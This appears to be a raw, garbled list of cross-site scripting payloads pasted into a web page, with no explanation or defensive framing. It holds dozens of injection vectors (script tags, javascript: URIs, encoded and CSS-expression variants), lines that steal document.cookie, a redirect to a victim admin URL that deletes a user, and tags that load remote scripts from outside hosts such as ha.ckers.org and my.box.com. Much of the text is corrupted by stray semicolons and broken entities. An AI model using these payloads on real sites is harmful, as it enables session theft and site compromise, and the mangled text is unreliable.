<br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=javascript:alert(\"XSS\")>\";' > out perl -e 'print \"<SCRIPT>alert(\"XSS\")</SCRIPT>\";' > out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> ‘;;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))//–>;;”;>;';>;;alert(String.fromCharCode(88,83,83)); ‘;';;!–“;;=&;{()} ;alert(‘;XSS';); ;; ;alert(String.fromCharCode(88,83,83)); ; ; ; ; ; ; ; ;;; ;; ; ; ; ; ; ; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); ;li {list-style-image: url(“;javascript:alert('XSS')”;);};;;XSS ; ;; ; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE ; ; ; ; ;; ;;; ;; a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS';);”;)”;; eval(a+b+c+d); ;alert(‘;XSS';);; ; ; ;.XSS{background-image:url(“;javascript:alert(‘;XSS';)”;);};;; ;BODY{background:url(“;javascript:alert(‘;XSS';)”;)}; ; ; ;@import';http://ha.ckers.org/xss.css';;; <;META HTTP-EQUIV=";Link"; Content=";;; REL=stylesheet”;>; ;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss”;)}; ;; ;;;; ; ;;;<;![CDATA[;;]]>; ;;;<;IMG SRC=";javas;cript:alert(‘;XSS';)”;>;;;; ;; ;; ; <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=;alert(‘;XSS';);”;>; ; ;; <;!–#exec cmd=";/bin/echo ';;;;';”;–>; <;? echo(';<;SCR)';; ; ; ; ; ; ; ; ; ; ;; ;+ADw-SCRIPT+AD4-alert(‘;XSS';);+ADw-/SCRIPT+AD4- \”;;alert(‘;XSS';);// ;;alert(“XSS”);; ;@im\port';\ja\vasc\ript:alert(“;XSS”;)';;; ; ; ; ; ; perl -e ‘;print “;”;;';>; out perl -e ‘;print “;&;;alert(“;XSS”;);”;;'; >; out ; ;; ; <;SCRIPT SRC=http://ha.ckers.org/xss.js ; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;;alert(“;XSS”;);//<;; ;;alert(“;XSS”;);”;>; ;a=/XSS/ ;”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;; ;; ;';”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;` SRC=”;http://ha.ckers.org/xss.js”;>;; ;document.write(“;<;SCRI";);;PT SRC=”;http://ha.ckers.org/xss.js”;>;; ‘;>”; SRC=”;http://ha.ckers.org/xss.js”;>;; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; ;XSS; document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; \”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] “;>;; ;;alert(1); ; ;alert(1); ; perl -e 'print \”;;\”;;' >; out perl -e 'print \”;;alert(\”;XSS\”;);\”;;' >; out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> >”>alert(“XSS”)& “>@import”javascript:alert(‘XSS’)”; >”‘> >%22%27> ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’ ”;!–“= <IMG SRC=JaVaScRiPt:alert("XSS")> <IMGSRC=java&#115;crip&#116;:ale&#114;t('X&#83;S'&#41> <IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert(‘XSS’);”> <IMG SRC="jav ascript:alert(‘XSS’);”> <![CDATA[var n=0;while(true){n++;}]]> <![CDATA[SCRIPT]]>alert(‘gotcha’);<![CDATA[/SCRIPT]]> <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; alert(‘XSS’) %3cscript%3ealert(‘XSS’)%3c/script%3e %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e alert(“XSS”)”> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) =(◕_◕)=" />

Our rating

Your's rating

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
“>alert(document.cookie)
“><alert(document.cookie);//<
fooalert(document.cookie)
<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
alert(document.cookie)

alert(1)
“>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))






xxs link
xxs link
alert(“XSS”)”>












<alert(“XSS”);//<
<SCRIPT SRC=http://ha.ckers.org/xss.js?

<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
alert(‘XSS’);
alert(“XSS”);



li {list-style-image: url(“javascript:alert(‘XSS’)”);}